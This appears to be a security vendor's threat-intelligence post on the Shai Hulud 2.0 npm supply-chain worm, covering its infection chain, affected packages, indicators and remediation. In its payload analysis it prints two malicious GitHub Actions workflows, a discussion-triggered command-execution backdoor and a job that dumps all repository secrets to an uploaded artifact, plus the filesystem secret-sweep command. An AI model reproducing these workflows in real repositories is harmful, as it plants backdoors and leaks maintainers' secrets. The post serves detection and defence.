Shai Hulud 2.0: The NPM Supply Chain Attack Returns as an Aggressive Self-Propagating Worm

The newly uncovered “Shai Hulud 2.0” campaign is one of the most aggressive npm supply-chain attacks to date. Unlike the earlier, more contained incident, this wave introduces a fully automated worm that rapidly spreads across maintainers, repositories, and dependency graphs. More than 25,000 repositories tied to hundreds of developers have already been affected, driven by malicious preinstall scripts, workflow injections, and forced repository migrations used to harvest credentials and republish altered packages at scale. This post outlines how the new wave differs from the original attack, how the worm operates, what was impacted, and the key behaviors organizations should watch for when detecting active compromise.

Update — Ongoing Campaign Activity

The newly observed Shai Hulud–linked packages continue to appear, including major projects that were trojanized with preinstall-stage malware. Propagation is accelerating at roughly 1,000 new malicious repositories every 30 minutes, and active exfiltration of developer secrets has been confirmed across multiple ecosystems. This section will be updated as additional intelligence becomes available.

What We’re Seeing in This New Shai Hulud Wave

The new Shai Hulud wave shows a clear jump in scale and sophistication. Instead of a limited set of targeted packages, this campaign has spread across more than 25,000 repositories and hundreds of maintainers, driven by malicious pre-install scripts that fetch components like setup_bun.js and bun_environment.js to harvest credentials and deepen access into development workflows.

Upwind’s runtime insights capture this behavior directly: multiple GitHub Actions runners executed the same infection chain—npm install triggering setup_bun.js, followed by bun and a hidden TruffleHog binary harvested from .truffler-cache. These executions occurred across separate ARC runners within minutes, demonstrating fully automated propagation designed to collect secrets and metadata during every CI job.

The speed and automation of this wave turn each compromised maintainer into a point of amplification. Stolen tokens are reused instantly to republish malicious packages and inject rogue workflows, transforming Shai Hulud 2.0 into an ecosystem-wide worm rather than an isolated supply-chain incident.

How the Worm Operates

Shai Hulud 2.0 spreads through a simple but highly scalable workflow: compromised npm or GitHub tokens are used to republish legitimate packages with a malicious preinstall script, which executes automatically during installation. Upwind’s detections show this script triggering a consistent chain—npm install launching setup_bun.js, followed by node and bun processes that stage the payload and run secret-harvesting tools directly on GitHub Actions runners.

The major evolution in this wave is the worm’s use of GitHub Actions as an automation and persistence layer. Injected workflows enable remote command execution and mass repository operations without relying on the initial infected environment. Once a maintainer is compromised, every installation of their packages becomes a new propagation event, with harvested tokens immediately used to republish additional modified packages. This self-reinforcing cycle is what allows Shai Hulud 2.0 to scale from a single compromise into a widespread ecosystem-level worm.

Payload Analysis

The Shai Hulud 2.0 payload extends well beyond npm lifecycle scripts. Once a maintainer is compromised, the worm executes a multi-stage payload capable of GitHub workflow injection, cloud credential harvesting, and local privilege escalation. The malware targets AWS, Azure, and GCP by scraping credentials from environment variables, config files, and cloud metadata services, and uses them to access Secret Manager services across all three clouds. It also attempts Docker-based privilege escalation on developer machines by launching privileged containers and modifying sudoers files to gain root access.

Backdoor Workflow (Discussion-Triggered Command Execution)

A workflow is added under .github/workflows/, registering the victim machine as a self-hosted runner and enabling arbitrary command execution whenever a GitHub Discussion is opened.

name: Discussion Create
on:
  discussion:
jobs:
  process:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v5
      - name: Handle Discussion
        run: echo ${{ github.event.discussion.body }}

Secrets Exfiltration Workflow

A second workflow serializes all GitHub repository secrets, writes them to a JSON file, uploads the file as a CI artifact, and then deletes itself to minimize evidence of exfiltration.

name: Code Formatter
on:
  push
jobs:
  lint:
    runs-on: ubuntu-latest
    env:
      DATA: ${{ toJSON(secrets) }}
    steps:
      - uses: actions/checkout@v5
      - name: Run Formatter
        run: |
          echo "$DATA" > format.json
      - uses: actions/upload-artifact@v5
        with:
          path: format.json
          name: formatting

Indicators Left Behind by the Worm

As the Shai Hulud 2.0 worm propagates, it leaves behind a consistent set of operational artifacts that make compromise identifiable across CI runners and developer environments. Upwind’s telemetry surfaced several of these indicators in real GitHub Actions runners. The most important include:

• Malicious preinstall lifecycle scripts

Unexpected preinstall hooks in package.json that execute files such as setup_bun.js or bun_environment.js.

• Execution chains involving sh, bun, and TruffleHog

Upwind observed identical process trees across multiple runners:

npm install → sh -c node setup_bun.js → node setup_bun.js → bun → trufflehog.

This sequence directly reflects the Shai Hulud payload execution flow.

• TruffleHog launched from hidden cache paths

The worm consistently drops and executes TruffleHog from:

/home/runner/.truffler-cache/trufflehog

and sweeps the runner filesystem using flags like:

filesystem /home/runner --json.

• Rogue or unexpected GitHub Actions activity

Unauthorized workflow files appearing inside .github/workflows/, or the use of automation identities to trigger mass repository operations.

• Abnormal repository operations

High-volume repository creation, private-to-public migrations, or automated cloning sequences—often performed within seconds.

• Temporary secret-collection files

Dropped artifacts such as data.json, cloud.json, contents.json, environment.json, and truffleSecrets.json containing collected secrets and metadata.

• Repeated execution across ephemeral runners

Upwind detected the same infection chain on multiple ARC-based runners within minutes, indicating automated propagation rather than isolated misuse.

These IOCs provide a clear and reliable detection baseline. They map directly to the internal mechanics of Shai Hulud 2.0: automated installation-time execution, credential harvesting, workflow injection, and multi-repository propagation.

*See the appendix for the full list of affected packages.

Affected Maintainers and Packages

More than 25,000 repositories across roughly 350 maintainers were affected. The worm spread through maintainer accounts rather than targeting specific packages, resulting in both prominent and low-visibility projects being compromised. Private repositories were cloned and republished under new names, exposing code, secrets, and build configurations.

Confirmed affected ecosystems include:

• Smaller ecosystem tools such as typeorm-orbit, orbit-nebula-draw-tools, and redux-forge
  
• Zapier, with republished versions of zapier-platform-core, zapier-platform-cli, zapier-sdk, and more across 0.15.x and 18.0.x releases
  
• ENS Domains, including packages such as @ensdomains/ensjs, @ensdomains/content-hash, and ethereum-ens
  
• Other publishers, including @posthog/agent, @trigo/*, @orbitgtbelgium/*, and @louisle2/*

Recommended Actions

To contain Shai Hulud 2.0 and harden against similar waves, organizations should:

1. Find and remove compromised packages:

Scan developer machines, build servers, and CI runners for known affected npm versions, clear npm caches, reinstall from trusted builds, and temporarily freeze new npm package updates until exposure is understood.

2. Rotate credentials broadly:

Revoke and regenerate npm tokens, GitHub PATs, SSH keys, and cloud credentials (AWS, GCP, Azure), and enforce strong MFA and short-lived, scoped tokens for developers and automation.

3. Audit GitHub and CI/CD for persistence:

Review .github/workflows/ and pipeline configs for unexpected workflows, new branches, or automation identities; remove any that serialize secrets, run on self-hosted runners, or were recently added without clear ownership.

4. Reset and harden runners and build agents:

Recreate self-hosted runners and CI agents from clean images, ensure least-privilege permissions, and monitor for filesystem-wide scans, destructive file operations, or unexpected secret-scanning tools.

5. Tighten pipeline guardrails:

Restrict or disable npm lifecycle scripts in CI, limit outbound network access from build environments to trusted domains, and require review/approval for new packages or versions (a short cooldown before adopting newly published versions).

6. Continuously monitor runtime behavior:

Use runtime telemetry (such as Upwind) to detect anomalous install-time activity, unexpected workflow creation, secret access patterns, and command execution on CI runners so supply-chain worms are caught before they reach production.

How Upwind Protects You

• Comprehensive dependency intelligence that maps every package and version used across your environment, automatically highlighting suspicious or newly published artifacts consistent with Shai Hulud’s republishing patterns. Upwind identifies risky dependency chains before they reach production.
• Real-time runtime monitoring through Upwind’s sensor technology, which detects abnormal install-time activity such as unexpected lifecycle scripts, token-harvesting attempts, unauthorized workflow creation, and outbound connections initiated by malicious package payloads.
• Behavior-based detection that analyzes developer, CI, and workload activity to surface patterns the Shai Hulud worm relies on—obfuscated script execution, unusual automation identities, rapid repository changes, and anomalies in client-side or build-time behavior.
• Context-driven risk prioritization that correlates compromised packages with the workloads, developers, and secrets they impact. Upwind provides clear, actionable guidance so security teams can quickly isolate affected systems, rotate credentials, and restore clean dependencies.

For support in identifying compromised packages, reach out to [email protected].

You can find the full list of affected packages below: